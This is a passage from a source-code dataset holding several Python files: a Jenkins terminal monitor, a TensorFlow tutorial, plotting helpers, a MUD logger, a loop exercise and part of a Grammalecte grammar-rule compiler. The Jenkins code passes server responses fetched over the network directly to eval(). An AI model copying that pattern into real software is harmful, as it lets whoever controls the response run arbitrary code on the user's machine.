focusRow)))\n\telif \"yellow\" in color:\n\t\tmyscreen.addstr(y, 2, \"[ UNSTABLE ]\", curses.color_pair(adjustColor(5, row, focusRow)))\n\telif \"red\":\n\t\tmyscreen.addstr(y, 2, \" [ FAILED ]\", curses.color_pair(adjustColor(6, row, focusRow)))\n\ndef getColorCode(color):\n\n\tif \"blue\" in color:\n\t\treturn 2\n\telif \"disabled\" in color:\n\t\treturn 4\n\telif \"yellow\" in color:\n\t\treturn 5\n\telif \"red\":\n\t\treturn 6\n\ndef build(focusRow):\n\tif focusRow in links.keys():\n\t\trequest = Request(links[focusRow] + \"/build/\")\n\t\tbase64string = base64.encodestring(('%s:%s' % (args.u, args.p)).encode()).decode().replace('\\n', '')\n\t\trequest.add_header(\"Authorization\", \"Basic %s\" % base64string)\n\t\turlopen(request, data=b\"\");\n\ndef getJobs(link):\n\tif args.u != None and args.p != None:\n\t\trequest = Request(link + \"/api/python?depth=1&pretty=true\")\n\t\tbase64string = base64.encodestring(('%s:%s' % (args.u, args.p)).encode()).decode().replace('\\n', '')\n\t\trequest.add_header(\"Authorization\", \"Basic %s\" % base64string)\n\t\treturn eval(urlopen(request).read());\n\telse:\n\t\treturn eval(urlopen(link + \"/api/python?depth=1&pretty=true\").read());\n\n\ndef findNextRowToFocus(oldRow):\n\n\tif list(links).index(oldRow) == len(links.keys())-1:\n\t\treturn links.keys()[0]\n\n\treturnNext = 0\n\n\tfor key in links.keys():\n\t\tif returnNext == 1:\n\t\t\treturn key\n\t\tif oldRow == key:\n\t\t\treturnNext = 1\n\ndef findPrevRowToFocus(oldRow):\n\n\tif list(links).index(oldRow) == 0:\n\t\treturn links.keys()[len(links.keys())-1]\n\n\tprevValue = 0\n\n\tfor key in links.keys():\n\t\tif oldRow == key:\n\t\t\treturn prevValue\n\t\tprevValue = key\n\ndef adjustColor(colorCode, row, focusRow):\n\n\tif focusRow == row:\n\t\treturn colorCode + 10\n\telse:\n\t\treturn colorCode\n\n\ninit();\n\ndisplayGui()\n","repo_name":"mariushe/cjenkins","sub_path":"cjenkins.py","file_name":"cjenkins.py","file_ext":"py","file_size_in_byte":8489,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"67"} +{"seq_id":"27949782259","text":"\n\n\nimport tensorflow as tf\n\n# Basic constant operations\n# The value returned by the constructor represents the output\n# of the Constant op.\nc1 = tf.constant(4)\nc2 = tf.constant(5)\n\n# Launch the default graph.\nwith tf.Session() as sess:\n print(\"c1=4, c2=5\")\n print(\"Addition with constants: %i\" % sess.run(c1+c2))\n print(\"Multiplication with constants: %i\" % sess.run(c1*c2))\n\n# Basic Operations with variable as graph input\n# The value returned by the constructor represents the output\n# of the Variable op. (define as input when running session)\n# tf Graph input\nc1 = tf.placeholder(tf.int16)\nc2 = tf.placeholder(tf.int16)\n\n# Define some operations\nadd = tf.add(c1, c2)\nmul = tf.multiply(c1, c2)\n\n# Launch the default graph.\nwith tf.Session() as sess:\n # Run every operation with variable input\n print(\"Addition with variables: %i\" % sess.run(add, feed_dict={c1: 4, c2: 5}))\n print(\"Multiplication with variables: %i\" % sess.run(mul, feed_dict={c1: 4, c2: 5}))\n\n","repo_name":"deocampo/bsd-tensorflow","sub_path":"introduction/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"42931992881","text":"\"\"\"\nCreated by Dan on 08/16/16.\nThis one contains all the plt-based graphic functions shared among all the functions.\nLast update: 09/30/18\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef mip_stack(img_stack, rot_axis = 'x', rot_angle = 0):\n '''\n create a max intensity projection of the input image stack.\n '''\n NZ, NY, NX = img_stack.shape\n if rot_angle == 0:\n return img_stack.max(axis = 0)\n\n\ndef image_scale_bar(fig_im, location, sc_length = 20., pxl_size = 0.295):\n \"\"\"\n fig: current figure handle\n question: should I pass a figure or a figure axes?\n pxl_size: the pixel size of the image, unit: micron\n location: the center of the scale bar. unit: px\n sc_length: scale bar length, unit micron.\n default width of the scale bar: 10 px\n \"\"\"\n ax = fig_im.get_axes()[0]\n h_sc = 0.5*sc_length/pxl_size\n\n xs = [location[1] - h_sc, location[1]+ h_sc]\n ys = [location[0], location[0]]\n ax.plot(xs, ys, '-w', linewidth = 10)\n # done with image_scale_bar\n\n\n\ndef image_zoom_frame(fig_im, c_nw, c_se, cl = 'w'):\n \"\"\"\n frame a rectangular area out from an imshow() image. default: white dashed line\n OK this works.\n \"\"\"\n ax = fig_im.get_axes()[0]\n y1, x1 = c_nw # northwest corner coordinate\n y2, x2 = c_se # southeast corner coordinate\n ax.plot([x1,x1], [y1, y2], '--', color = cl)\n ax.plot([x1,x2], [y1, y1], '--', color = cl)\n ax.plot([x2,x2], [y1, y2], '--', color = cl)\n ax.plot([x1,x2], [y2, y2], '--', color = cl)\n # done with image_zoom_frame\n\n\n\ndef slice_display(slice_blobs, title = None, ref_image = None, s_diag = 15):\n '''\n slice_blobs: a 2-D array specifying the cell coordinates\n ref_image: a 2-D array specifying the reference image.\n Adding multi-slice plotting:\n '''\n if ref_image is None:\n figd = plt.figure(figsize= (6.,4.) )\n ax = figd.add_subplot(111)\n else:\n ny, nx = ref_image.shape\n figd = plt.figure(figsize = (6., 6.*ny/nx))\n ax = figd.add_subplot(111)\n ax.imshow(ref_image, cmap = 'Greys_r')\n ax.set_xlim([0,nx])\n ax.set_ylim([0,ny])\n\n if isinstance(slice_blobs, list):\n ii = 0\n NS = len(slice_blobs)\n for fr in slice_blobs:\n ax.scatter(fr[:,1], fr[:,0], edgecolors = global_ccode[ii], facecolors = 'none', s = s_diag)\n ii+=1\n else:\n ax.scatter(slice_blobs[:,1], slice_blobs[:,0], c='g', s = s_diag, facecolors = 'none')\n\n ax.set_title(title, fontsize = 14)\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n figd.tight_layout()\n return figd\n\n\ndef slices_compare(im_slice1, im_slice2, title_1 = None, title_2 = None, fh = 3.):\n '''\n imshow two slices side by side.\n '''\n y1, x1 = im_slice1.shape\n y2, x2 = im_slice2.shape\n\n figc = plt.figure(figsize = (2*(x1+x2)/(y1+y2)*fh, fh))\n ax1 = figc.add_subplot(121)\n ax2 = figc.add_subplot(122)\n ax1.imshow(im_slice1, cmap = 'Greys_r')\n ax1.set_xlim([0, x1])\n ax1.set_ylim([0, y1])\n ax1.get_xaxis().set_visible(False)\n ax1.get_yaxis().set_visible(False)\n if title_1 is not None:\n ax1.set_title(title_1, fontsize = 13)\n\n ax2.imshow(im_slice2, cmap = 'Greys_r')\n ax2.set_xlim([0, x2])\n ax2.set_ylim([0, y2])\n ax2.get_xaxis().set_visible(False)\n ax2.get_yaxis().set_visible(False)\n if title_2 is not None:\n ax2.set_title(title_2, fontsize = 13)\n\n figc.tight_layout()\n return figc\n\n\n\ndef stack_display(zstack_3d, cl = 'b'):\n '''\n display a z-distribution of a stack\n column conventions: 0 -- z; 1 -- y; 2 -- x\n '''\n zs, ys, xs = zstack_3d[:,0], zstack_3d[:,1], zstack_3d[:,2]\n fig3d = plt.figure(figsize= (10,10))\n ax = fig3d.add_subplot(111, projection = '3d')\n ax.scatter(xs, ys, zs, c = cl, depthshade = True)\n ax.set_xlabel('Anterior -- Posterior', fontsize = 14)\n ax.set_ylabel('Left -- Right', fontsize = 14)\n ax.set_zlabel('Ventral--Dorsal', fontsize = 14)\n fig3d.tight_layout()\n return fig3d\n\n\n","repo_name":"danustc/CalAnalyzer","sub_path":"calanalyzer/visualization/image_display.py","file_name":"image_display.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"10858498803","text":"import datetime\nimport time\nimport traceback\n\n# Variables shared between all Logger instances.\n_LOGFILE = None\n_LOGLEVEL = None\n_STDOUT = None\n_WAITONCRITICAL = None\n\n\ndef init(config):\n \"\"\"Initialize the Logger system.\n \n This must be run before creating any Logger instances.\n It sets up global variables that are shared between all Loggers.\n \"\"\"\n global _LOGFILE, _LOGLEVEL, _STDOUT, _WAITONCRITICAL\n\n # Note that we are initializing the logger.\n print(\"Initializing logger...\")\n\n # On singleuser, we might wait on critical errors.\n if \"wait_on_critical\" in config[\"log\"]:\n _WAITONCRITICAL = config[\"log\"][\"wait_on_critical\"]\n\n # Make sure the chosen log level is valid. Otherwise force the highest log level.\n if config[\"log\"][\"level\"] not in [\"critical\", \"error\", \"warn\", \"info\", \"debug\"]:\n print(timestamp(), \"[logger#error] Invalid log level in config, defaulting to \\\"debug\\\".\")\n config[\"log\"][\"level\"] = \"debug\"\n _LOGLEVEL = config[\"log\"][\"level\"]\n\n # For the server, give an error if no logging option is selected, and default to stdout.\n # On singleuser, stdout is always enabled.\n if \"stdout\" in config[\"log\"]:\n if not config[\"log\"][\"stdout\"] and not config[\"log\"][\"file\"]:\n # No logging target is set, so force stdout.\n print(timestamp(), \"[logger#error] No logging target in config, defaulting to stdout.\")\n config[\"log\"][\"stdout\"] = True\n _STDOUT = True\n elif config[\"log\"][\"stdout\"]:\n _STDOUT = True\n else:\n _STDOUT = True\n\n # Try to open the log file. If this fails, give an error and default to stdout.\n if config[\"log\"][\"file\"]:\n try:\n _LOGFILE = open(config[\"log\"][\"file\"], 'a')\n except:\n if _LOGLEVEL in [\"debug\", \"info\", \"warn\", \"error\"]:\n print(timestamp(), \"[logger#error] Could not open log file: {0}\".format(\n config[\"log\"][\"file\"]))\n print(traceback.format_exc(1))\n if \"stdout\" in config[\"log\"]:\n config[\"log\"][\"stdout\"] = True\n _STDOUT = True\n\n # Note that we have finished initializing the logger.\n if _LOGLEVEL in [\"debug\", \"info\"]:\n if _STDOUT:\n print(timestamp(), \"[logger#info] Finished initializing logger.\")\n if _LOGFILE:\n _LOGFILE.write(timestamp() + \" [logger#info] Finished initializing logger.\\n\")\n\n\ndef timestamp():\n \"\"\"Return a Log timestamp.\n\n :return: Timestamp string.\n \"\"\"\n # Thanks to https://stackoverflow.com/questions/3168096/getting-computers-utc-offset-in-python\n is_dst = time.daylight and time.localtime().tm_isdst > 0\n utc_offset = - (time.altzone if is_dst else time.timezone)\n return \"{0}{1}\".format(datetime.datetime.now().isoformat(), str(int(utc_offset / 3.6)))\n\n\nclass Logger:\n \"\"\"Logger.\n\n Logs to STDOUT, and optionally to a file, and filters unwanted messages based on a log level setting.\n Each Logger instance can have its own namespace for which it tags messages.\n \"\"\"\n def __init__(self, namespace):\n \"\"\"Logger Initializer.\n\n :param namespace: The name of the subsystem this Logger instance is logging for.\n \"\"\"\n self._namespace = namespace\n\n def debug(self, msg, **kwargs):\n \"\"\"Write a debug level message to the console and/or the log file.\n \"\"\"\n try:\n msg = msg.format(**kwargs)\n except IndexError:\n pass\n if _LOGLEVEL in [\"debug\"]:\n if _STDOUT:\n print(\"{0} [{1}#debug] {2}\".format(timestamp(), self._namespace, msg))\n if _LOGFILE:\n _LOGFILE.write(\"{0} [{1}#debug] {2}\\n\".format(timestamp(), self._namespace, msg))\n\n def info(self, msg, **kwargs):\n \"\"\"Write an info level message to the console and/or the log file.\n \"\"\"\n if _LOGLEVEL in [\"debug\", \"info\"]:\n try:\n msg = msg.format(**kwargs)\n except IndexError:\n pass\n if _STDOUT:\n print(\"{0} [{1}#info] {2}\".format(timestamp(), self._namespace, msg))\n if _LOGFILE:\n _LOGFILE.write(\"{0} [{1}#info] {2}\\n\".format(timestamp(), self._namespace, msg))\n\n def warn(self, msg, **kwargs):\n \"\"\"Write a warn level message to the console and/or the log file.\n \"\"\"\n if _LOGLEVEL in [\"debug\", \"info\", \"warn\"]:\n try:\n msg = msg.format(**kwargs)\n except IndexError:\n pass\n if _STDOUT:\n print(\"{0} [{1}#warn] {2}\".format(timestamp(), self._namespace, msg))\n if _LOGFILE:\n _LOGFILE.write(\"{0} [{1}#warn] {2}\\n\".format(timestamp(), self._namespace, msg))\n\n def error(self, msg, **kwargs):\n \"\"\"Write an error level message to the console and/or the log file.\n \"\"\"\n if _LOGLEVEL in [\"debug\", \"info\", \"warn\", \"error\"]:\n try:\n msg = msg.format(**kwargs)\n except IndexError:\n pass\n if _STDOUT:\n print(\"{0} [{1}#error] {2}\".format(timestamp(), self._namespace, msg))\n if _LOGFILE:\n _LOGFILE.write(\"{0} [{1}#error] {2}\\n\".format(timestamp(), self._namespace, msg))\n\n def critical(self, msg, **kwargs):\n \"\"\"Write a critical level message to the console and/or the log file.\n\n All log levels include critical, so these messages cannot be disabled.\n \"\"\"\n try:\n msg = msg.format(**kwargs)\n except IndexError:\n pass\n print(\"{0} [{1}#critical] {2}\".format(timestamp(), self._namespace, msg))\n if _LOGFILE:\n _LOGFILE.write(\"{0} [{1}#critical] {2}\\n\".format(timestamp(), self._namespace, msg))\n\n # Be nice to Windows users who ran the program by double-clicking. :)\n if _WAITONCRITICAL:\n input(\"Press Enter Key to Continue...\")\n\n def write(self, msg):\n \"\"\"Write an untagged message to the console and/or the log file, regardless of log level.\n \"\"\"\n print(msg)\n if _LOGFILE:\n _LOGFILE.write(\"{0} {1}\\n\".format(timestamp(), msg))\n","repo_name":"seisatsu/DennisMUD","sub_path":"lib/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":6248,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"67"} +{"seq_id":"41762095599","text":"\n\n# for letter in 'Mike Daniels':\n# print(letter)\n\n# prices = [10, 20, 30]\n# total = 0\n#\n# for price in prices:\n# total += price\n#\n# print(f'Total: {total}')\n\n# Exercise\nnumbers = [2, 2, 2, 2, 2, 8]\n\nfor num in numbers:\n print('x' * num)\n","repo_name":"Umar9292/python_practice","sub_path":"for_loop.py","file_name":"for_loop.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72169657814","text":"\nimport re\nimport sys\nimport traceback\nimport copy\nimport json\nfrom distutils import file_util\n\nfrom grammalecte.echo import echo\n\n\nDEF = {}\nFUNCTIONS = []\n\nJSREGEXES = {}\n\nWORDLIMITLEFT = r\"(?= 0)\", sCode)\n sCode = re.sub(\".search\\\\(/\\\\(\\\\?i\\\\)([^/]+)/\\\\) >= 0\\\\)\", \".search(/\\\\1/i) >= 0)\", sCode)\n sCode = re.sub('(look\\\\(sx?[][.a-z:()]*), \"\\\\(\\\\?i\\\\)([^\"]+)\"', \"\\\\1, /\\\\2/i\", sCode)\n sCode = re.sub('(look\\\\(sx?[][.a-z:()]*), \"([^\"]+)\"', \"\\\\1, /\\\\2/\", sCode)\n sCode = re.sub('(look_chk1\\\\(dDA, sx?[][.a-z:()]*, [0-9a-z.()]+), \"\\\\(\\\\?i\\\\)([^\"]+)\"', \"\\\\1, /\\\\2/i\", sCode)\n sCode = re.sub('(look_chk1\\\\(dDA, sx?[][.a-z:()]*, [0-9a-z.()]+), \"([^\"]+)\"', \"\\\\1, /\\\\2/i\", sCode)\n sCode = sCode.replace(\"(? lists\n sCode = re.sub(\"\\((m\\.start\\[\\\\d+\\], m\\[\\\\d+\\])\\)\", \"[\\\\1]\", sCode)\n # regex\n sCode = sCode.replace(\"\\w[\\w-]+\", \"[a-zA-Zà-öÀ-Ö0-9_ø-ÿØ-ßĀ-ʯfi-st][a-zA-Zà-öÀ-Ö0-9_ø-ÿØ-ßĀ-ʯfi-st-]+\")\n sCode = sCode.replace(r\"/\\w/\", \"/[a-zA-Zà-öÀ-Ö0-9_ø-ÿØ-ßĀ-ʯfi-st]/\")\n sCode = sCode.replace(r\"[\\w-]\", \"[a-zA-Zà-öÀ-Ö0-9_ø-ÿØ-ßĀ-ʯfi-st-]\")\n sCode = sCode.replace(r\"[\\w,]\", \"[a-zA-Zà-öÀ-Ö0-9_ø-ÿØ-ßĀ-ʯfi-st,]\")\n return sCode\n\n\ndef uppercase (s, sLang):\n \"(flag i is not enough): converts regex to uppercase regex: 'foo' becomes '[Ff][Oo][Oo]', but 'Bar' becomes 'B[Aa][Rr]'.\"\n sUp = \"\"\n nState = 0\n for i in range(0, len(s)):\n c = s[i]\n if c == \"[\":\n nState = 1\n if nState == 1 and c == \"]\":\n nState = 0\n if c == \"<\" and i > 3 and s[i-3:i] == \"(?P\":\n nState = 2\n if nState == 2 and c == \">\":\n nState = 0\n if c == \"?\" and i > 0 and s[i-1:i] == \"(\" and s[i+1:i+2] != \":\":\n nState = 5\n if nState == 5 and c == \")\":\n nState = 0\n if c.isalpha() and c.islower() and nState == 0:\n if c == \"i\" and (sLang == \"tr\" or sLang == \"az\"):\n sUp += \"[İ\" + c + \"]\"\n else:\n sUp += \"[\" + c.upper() + c + \"]\"\n elif c.isalpha() and c.islower() and nState == 1 and s[i+1:i+2] != \"-\":\n if s[i-1:i] == \"-\" and s[i-2:i-1].islower(): # [a-z] -> [a-zA-Z]\n sUp += c + s[i-2:i-1].upper() + \"-\" + c.upper()\n elif c == \"i\" and (sLang == \"tr\" or sLang == \"az\"):\n sUp += \"İ\" + c\n else:\n sUp += c.upper() + c\n else:\n sUp += c\n if c == \"\\\\\":\n nState = 4\n elif nState == 4:\n nState = 0\n return sUp\n\n\ndef countGroupInRegex (sRegex):\n try:\n return re.compile(sRegex).groups\n except:\n traceback.print_exc()\n echo(sRegex)\n return 0\n\n\ndef createRule (s, nIdLine, sLang, bParagraph):\n \"returns rule as list [option name, regex, bCaseInsensitive, identifier, list of actions]\"\n global JSREGEXES\n\n #### OPTIONS\n sLineId = str(nIdLine) + (\"p\" if bParagraph else \"s\")\n sRuleId = sLineId\n sOption = False # False or [a-z0-9]+ name\n tGroups = None # code for groups positioning (only useful for JavaScript)\n cCaseMode = 'i' # i: case insensitive, s: case sensitive, u: uppercasing allowed\n cWordLimitLeft = '[' # [: word limit, <: no specific limit\n cWordLimitRight = ']' # ]: word limit, >: no specific limit\n m = re.match(\"^__([[<]\\\\w[]>])(/[a-zA-Z0-9]+|)(\\\\(\\\\w+\\\\)|)__ *\", s)\n if m:\n cWordLimitLeft = m.group(1)[0]\n cCaseMode = m.group(1)[1]\n cWordLimitRight = m.group(1)[2]\n sOption = m.group(2)[1:] if m.group(2) else False\n if m.group(3):\n sRuleId = m.group(3)[1:-1]\n s = s[m.end(0):]\n else:\n echo(\"Warning. No option defined at line: \" + sLineId)\n\n #### REGEX TRIGGER\n i = s.find(\" <<-\")\n if i == -1:\n print(\"# Error: no condition at line \" + sLineId)\n return None\n sRegex = s[:i].strip()\n s = s[i+4:]\n \n # JS groups positioning codes\n m = re.search(\"@@\\\\S+\", sRegex)\n if m:\n tGroups = groupsPositioningCodeToList(sRegex[m.start()+2:])\n sRegex = sRegex[:m.start()].strip()\n # JS regex\n m = re.search(\".+i?\", sRegex)\n if m:\n JSREGEXES[sLineId] = m.group(0)\n sRegex = sRegex[:m.start()].strip()\n if \"\" in sRegex or \"\" in sRegex:\n print(\"# Error: JavaScript regex not delimited at line \" + sLineId)\n return None\n\n # quotes ?\n if sRegex.startswith('\"') and sRegex.endswith('\"'):\n sRegex = sRegex[1:-1]\n\n ## definitions\n for sDef, sRepl in DEF.items():\n sRegex = sRegex.replace(sDef, sRepl)\n\n ## count number of groups (must be done before modifying the regex)\n nGroup = countGroupInRegex(sRegex)\n if nGroup > 0:\n if not tGroups:\n print(\"# warning: groups positioning code for JavaScript should be defined at line \" + sLineId)\n else:\n if nGroup != len(tGroups):\n print(\"# error: groups positioning code irrelevant at line \" + sLineId)\n\n ## word limit\n if cWordLimitLeft == '[' and not sRegex.startswith((\"^\", '’', \"'\", \",\")):\n sRegex = WORDLIMITLEFT + sRegex\n if cWordLimitRight == ']' and not sRegex.endswith((\"$\", '’', \"'\", \",\")):\n sRegex = sRegex + WORDLIMITRIGHT\n\n ## casing mode\n if cCaseMode == \"i\":\n bCaseInsensitive = True\n if not sRegex.startswith(\"(?i)\"):\n sRegex = \"(?i)\" + sRegex\n elif cCaseMode == \"s\":\n bCaseInsensitive = False\n sRegex = sRegex.replace(\"(?i)\", \"\")\n elif cCaseMode == \"u\":\n bCaseInsensitive = False\n sRegex = sRegex.replace(\"(?i)\", \"\")\n sRegex = uppercase(sRegex, sLang)\n else:\n print(\"# Unknown case mode [\" + cCaseMode + \"] at line \" + sLineId)\n\n ## check regex\n try:\n z = re.compile(sRegex)\n except:\n print(\"# Regex error at line \", nIdLine)\n echo(sRegex)\n traceback.print_exc()\n return None\n ## groups in non grouping parenthesis\n for x in re.finditer(\"\\(\\?:[^)]*\\([[\\w -]\", sRegex):\n print(\"# Warning: groups inside non grouping parenthesis in regex at line \" + sLineId)\n\n #### PARSE ACTIONS\n lActions = []\n nAction = 1\n for sAction in s.split(\" <<- \"):\n t = createAction(sLineId + \"_\" + str(nAction), sAction, nGroup)\n nAction += 1\n if t:\n lActions.append(t)\n if not lActions:\n return None\n\n return [sOption, sRegex, bCaseInsensitive, sLineId, sRuleId, lActions, tGroups]\n\n\ndef createAction (sIdAction, sAction, nGroup):\n \"returns an action to perform as a tuple (condition, action type, action[, iGroup [, message, URL ]])\"\n global FUNCTIONS\n\n m = re.search(r\"([-~=>])(\\d*|)>>\", sAction)\n if not m:\n echo(\"# No action at line \" + sIdAction)\n return None\n\n #### CONDITION\n sCondition = sAction[:m.start()].strip()\n if sCondition:\n sCondition = prepareFunction(sCondition)\n FUNCTIONS.append((\"c\"+sIdAction, sCondition))\n for x in re.finditer(\"[.](?:group|start|end)[(](\\d+)[)]\", sCondition):\n if int(x.group(1)) > nGroup:\n print(\"# Error in groups in condition at line \" + sIdAction + \" (\"+str(nGroup)+\" groups only)\")\n if \".match\" in sCondition:\n echo(\"# Error. JS compatibility. Don't use .match() in condition, use .search()\")\n sCondition = \"c\"+sIdAction\n else:\n sCondition = None\n\n #### iGroup / positioning\n iGroup = int(m.group(2)) if m.group(2) else 0\n if iGroup > nGroup:\n echo(\"# Selected group > group number in regex at line \" + sIdAction)\n \n #### ACTION\n sAction = sAction[m.end():].strip()\n cAction = m.group(1)\n if cAction == \"-\":\n ## error\n iMsg = sAction.find(\" # \")\n sMsg = sAction[iMsg+3:].strip()\n sAction = sAction[:iMsg].strip()\n sURL = \"\"\n mURL = re.search(\"[|] *(https?://.*)\", sMsg)\n if mURL:\n sURL = mURL.group(1).strip()\n sMsg = sMsg[:mURL.start(0)].strip()\n if sMsg[0:1] == \"=\":\n sMsg = prepareFunction(sMsg[1:])\n FUNCTIONS.append((\"m\"+sIdAction, sMsg))\n for x in re.finditer(\"group[(](\\d+)[)]\", sMsg):\n if int(x.group(1)) > nGroup:\n print(\"# error in groups in message at line \" + sIdAction + \" (\"+str(nGroup)+\" groups only)\")\n sMsg = \"=m\"+sIdAction\n else:\n for x in re.finditer(r\"\\\\(\\d+)\", sMsg):\n if int(x.group(1)) > nGroup:\n print(\"# error in groups in message at line \" + sIdAction + \" (\"+str(nGroup)+\" groups only)\")\n if re.search(\"[.]\\\\w+[(]\", sMsg):\n print(\"# error in message at line \" + sIdAction + \": This message looks like code. Line should begin with =\")\n \n if sAction[0:1] == \"=\" or cAction == \"=\":\n if \"define\" in sAction and not re.search(r\"define\\(\\\\\\d+ *, *\\[.*\\] *\\)\", sAction):\n print(\"# error in action at line \" + sIdAction + \": second argument for define must be a list of strings\")\n sAction = prepareFunction(sAction)\n sAction = sAction.replace(\"m.group(i[4])\", \"m.group(\"+str(iGroup)+\")\")\n for x in re.finditer(\"group[(](\\d+)[)]\", sAction):\n if int(x.group(1)) > nGroup:\n print(\"# error in groups in replacement at line \" + sIdAction + \" (\"+str(nGroup)+\" groups only)\")\n else:\n for x in re.finditer(r\"\\\\(\\d+)\", sAction):\n if int(x.group(1)) > nGroup:\n print(\"# error in groups in replacement at line \" + sIdAction + \" (\"+str(nGroup)+\" groups only)\")\n if re.search(\"[.]\\\\w+[(]\", sAction):\n print(\"# error in action at line \" + sIdAction + \": This action looks like code. Line should begin with =\")\n\n \n\n if cAction == \"-\":\n ## error detected\n if not sAction:\n print(\"# error in action at line \" + sIdAction + \": This action is empty.\")\n if sAction[0:1] == \"=\":\n FUNCTIONS.append((\"s\"+sIdAction, sAction[1:]))\n sAction = \"=s\"+sIdAction\n elif sAction.startswith('\"') and sAction.endswith('\"'):\n sAction = sAction[1:-1]\n if not sMsg:\n print(\"# error in action at line \" + sIdAction + \": the message is empty.\")\n return [sCondition, cAction, sAction, iGroup, sMsg, sURL]\n elif cAction == \"~\":\n ## text preprocessor\n if not sAction:\n print(\"# error in action at line \" + sIdAction + \": This action is empty.\")\n if sAction[0:1] == \"=\":\n FUNCTIONS.append((\"p\"+sIdAction, sAction[1:]))\n sAction = \"=p\"+sIdAction\n elif sAction.startswith('\"') and sAction.endswith('\"'):\n sAction = sAction[1:-1]\n return [sCondition, cAction, sAction, iGroup]\n elif cAction == \"=\":\n ## disambiguator\n if sAction[0:1] == \"=\":\n sAction = sAction[1:]\n if not sAction:\n print(\"# error in action at line \" + sIdAction + \": This action is empty.\")\n FUNCTIONS.append((\"d\"+sIdAction, sAction))\n sAction = \"d\"+sIdAction\n return [sCondition, cAction, sAction]\n elif cAction == \">\":\n ## no action, break loop if condition is False\n return [sCondition, cAction, \"\"]\n else:\n echo(\"# Unknown action at line \" + sIdAction)\n return None\n\n\ndef regex2js (sRegex):\n \"converts Python regex to JS regex and returns JS regex and list of negative lookbefore assertions\"\n # Latin letters: http://unicode-table.com/fr/\n # 0-9 and _\n # A-Z\n # a-z\n # À-Ö 00C0-00D6 (upper case)\n # Ø-ß 00D8-00DF (upper case)\n # à-ö 00E0-00F6 (lower case)\n # ø-ÿ 00F8-00FF (lower case)\n # Ā-ʯ 0100-02AF (mixed)\n # -> a-zA-Zà-öÀ-Ö0-9_ø-ÿØ-ßĀ-ʯ\n bCaseInsensitive = False\n if \"(?i)\" in sRegex:\n sRegex = sRegex.replace(\"(?i)\", \"\")\n bCaseInsensitive = True\n lNegLookBeforeRegex = []\n if WORDLIMITLEFT in sRegex:\n sRegex = sRegex.replace(WORDLIMITLEFT, \"\")\n lNegLookBeforeRegex = [\"[a-zA-Zà-öÀ-Ö0-9_ø-ÿØ-ßĀ-ʯ.,–-]$\"]\n sRegex = sRegex.replace(\"[\\\\w\", \"[a-zA-Zà-öÀ-Ö0-9_ø-ÿØ-ßĀ-ʯ\")\n sRegex = sRegex.replace(\"\\\\w\", \"[a-zA-Zà-öÀ-Ö0-9_ø-ÿØ-ßĀ-ʯ]\")\n sRegex = sRegex.replace(\"[.]\", r\"\\.\")\n if not sRegex.startswith(\"\"):\n sRegex = sRegex.replace(\"/\", r\"\\/\")\n m = re.search(r\"\\(\\?\"):\n sRegex = sRegex.replace('', '/').replace('i', '/ig').replace('', '/g')\n else:\n sRegex = \"/\" + sRegex + \"/g\"\n if bCaseInsensitive and not sRegex.endswith(\"/ig\"):\n sRegex = sRegex + \"i\"\n if not lNegLookBeforeRegex:\n lNegLookBeforeRegex = None\n return (sRegex, lNegLookBeforeRegex)\n\n\ndef pyRuleToJS (lRule):\n lRuleJS = copy.deepcopy(lRule)\n del lRule[-1] # tGroups positioning codes are useless for Python\n # error messages\n for aAction in lRuleJS[5]:\n if aAction[1] == \"-\":\n aAction[4] = aAction[4].replace(\"« \", \"« \").replace(\" »\", \" »\")\n # js regexes\n lRuleJS[1], lNegLookBehindRegex = regex2js( JSREGEXES.get(lRuleJS[3], lRuleJS[1]) )\n lRuleJS.append(lNegLookBehindRegex)\n return lRuleJS\n\n\ndef writeRulesToJSArray (lRules):\n s = \"[\\n\"\n for sOption, aRuleGroup in lRules:\n s += ' [\"' + sOption + '\", [\\n' if sOption else \" [false, [\\n\"\n for lRule in aRuleGroup:\n # [sRegex, bCaseInsensitive, sLineId, sRuleId, lActions, aGroups, aNegLookBehindRegex]\n s += ' [' + lRule[0] + \", \"\n s += \"true, \" if lRule[1] else \"false, \"\n s += '\"' + lRule[2] + '\", '\n s += '\"' + lRule[3] + '\", '\n s += json.dumps(lRule[4], ensure_ascii=False) + \", \"\n s += json.dumps(lRule[5], ensure_ascii=False) + \", \"\n s += json.dumps(lRule[6], ensure_ascii=False) + \"],\\n\"\n s += \" ]],\\n\"\n s += \"]\"\n return s\n\n\ndef groupsPositioningCodeToList (sGroupsPositioningCode):\n if not sGroupsPositioningCode:\n return None\n return [ int(sCode) if sCode.isdigit() or (sCode[0:1] == \"-\" and sCode[1:].isdigit()) else sCode \\\n for sCode in sGroupsPositioningCode.split(\",\") ]\n\n\ndef _calcRulesStats (lRules):\n d = {'=':0, '~': 0, '-': 0, '>': 0}\n for aRule in lRules:\n for aAction in aRule[5]:\n d[aAction[1]] = d[aAction[1]] + 1\n return (d, len(lRules))\n\n\ndef displayStats (lParagraphRules, lSentenceRules):\n echo(\" {:>18} {:>18} {:>18} {:>18}\".format(\"DISAMBIGUATOR\", \"TEXT PROCESSOR\", \"GRAMMAR CHECKING\", \"REGEX\"))\n d, nRule = _calcRulesStats(lParagraphRules)\n echo(\"§ {:>10} actions {:>10} actions {:>10} actions in {:>8} rules\".format(d['='], d['~'], d['-'], nRule))\n d, nRule = _calcRulesStats(lSentenceRules)\n echo(\"s {:>10} actions {:>10} actions {:>10} actions in {:>8} rules\".format(d['='], d['~'], d['-'], nRule))\n\n\ndef mergeRulesByOption (lRules):\n \"returns a list of tuples [option, list of rules] keeping the rules order\"\n lFinal = []\n lTemp = []\n sOption = None\n for aRule in lRules:\n if aRule[0] != sOption:\n if sOption != None:\n lFinal.append([sOption, lTemp])\n # new tuple\n sOption = aRule[0]\n lTemp = []\n lTemp.append(aRule[1:])\n lFinal.append([sOption, lTemp])\n return lFinal\n\n\ndef prepareOptions 